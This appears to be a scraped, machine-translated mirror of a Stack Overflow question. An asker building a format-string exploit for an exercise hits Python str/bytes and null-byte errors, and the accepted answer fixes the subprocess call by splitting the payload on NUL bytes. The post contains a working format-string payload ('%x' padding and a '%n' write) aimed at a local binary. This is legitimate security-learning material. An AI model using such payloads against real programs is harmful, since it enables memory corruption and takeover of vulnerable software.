堆栈内存溢出
  简体   繁体   English

“必须是没有 null 字节的字符串”或“无法将 str 连接到字节”在命令行上传递有效负载

[英]“must be a string without null bytes” or “can't concat str to bytes” passing a payload on a command line

 原文  2020-12-22 20:40:32       python/ python-3.x/ exploit/ shellcode

问题描述

I am trying to create an exploit for an exercise but I have a problem with the following code:我正在尝试为练习创建一个漏洞利用,但我对以下代码有疑问:

#!/usr/bin/python
import os
import struct
address = struct.pack("I",0x201014)
payload = address+"." + ".%x."*131 + ".%n."
os.system("/home/osboxes/Desktop/formatString " + payload)

But the mistake is as follows: TypeError: system() argument 1 must be string without null bytes, not str但错误如下: TypeError: system() argument 1 must be string without null bytes, not str

I am trying to upgrade to the current version of python with "subprocess" utility:我正在尝试使用“子进程”实用程序升级到 python 的当前版本:

#!/usr/bin/python3
import subprocess
import struct
address = struct.pack("I",0x201014)
payload = address+"." + ".%x."*131 + ".%n."
subprocess.call("/home/osboxes/Desktop/formatString " + payload, shell=True)

But the mistake is as follows: TypeError: can't concat str to bytes但是错误如下: TypeError: can't concat str to bytes

How could I fix the byte or str conversion problem for both versions?如何解决两个版本的字节或字符串转换问题? both programs agree that the error is in the line of "payload =..."两个程序都同意错误出现在“payload = ...”行中

1 个解决方案

解决方案1
 2 已采纳  2020-12-22 21:12:32

That string isn't capable of being passed as a command-line argument on UNIX.该字符串不能作为 UNIX 上的命令行参数传递。

Why?为什么? Because it contains NUL literals, and UNIX command lines are made up of C strings -- which are NUL-terminated.因为它包含 NUL 文字,并且 UNIX 命令行由 C 字符串组成——这些字符串都是以 NUL 结尾的。

>>> address = struct.pack("I",0x201014)
>>> address
b'\x14\x10 \x00'

See that \x00 ?看到\x00了吗? Not allowed, not possible -- not as one command-line argument, at least.不允许,不可能——至少不能作为一个命令行参数。

But you can put it in an argv, as long as it's split into multiple arguments.但是你可以把它放在一个argv中,只要它被分成多个arguments。 Note that shell=False below:请注意下面的shell=False

payload = (address + (b'.%x.' * 131) + b'.%n.').split(b'\0')
subprocess.call(['/home/osboxes/Desktop/formatString'] + payload)

How does this work?这是如何运作的? Because the \x00 s that terminate each individual C string are implicitly present at the boundary points.因为终止每个单独的 C 字符串\x00 s 隐式存在于边界点。

暂无
暂无

声明:本站的技术帖子网页,遵循CC BY-SA 4.0协议,如果您需要转载,请注明本站网址或者原文地址。任何问题请咨询:yoyou2525@163.com.

相关问题 TypeError:必须是不包含空字节的字符串,而不是str - TypeError: must be string without null bytes, not str 无法将字节连接到 str - Can't concat bytes to str TypeError: can't concat bytes to str, then, TypeError: write() 参数必须是str,而不是bytes - TypeError: can't concat bytes to str, then, TypeError: write() argument must be str, not bytes lines + = line / TypeError:无法将str连接为字节 - lines+=line/ TypeError: can't concat str to bytes TypeError:file()参数1必须是没有NULL字节的编码字符串,而不是str - TypeError: file() argument 1 must be encoded string without NULL bytes, not str TypeError:必须是不包含空字节的字符串,在os.system()中不能为str - TypeError: must be string without null bytes, not str in os.system() forloop TypeError:无法将 str 连接到字节 - forloop TypeError: can't concat str to bytes Python TypeError:无法将字节连接到str - Python TypeError: can't concat bytes to str Python 3.6:无法将str连接为字节 - Python 3.6: can't concat str to bytes python 3无法将字节连接到str以获取列表 - python 3 can't concat bytes to str for a list
相关标签
 
粤ICP备18138465号  © 2020-2024 STACKOOM.COM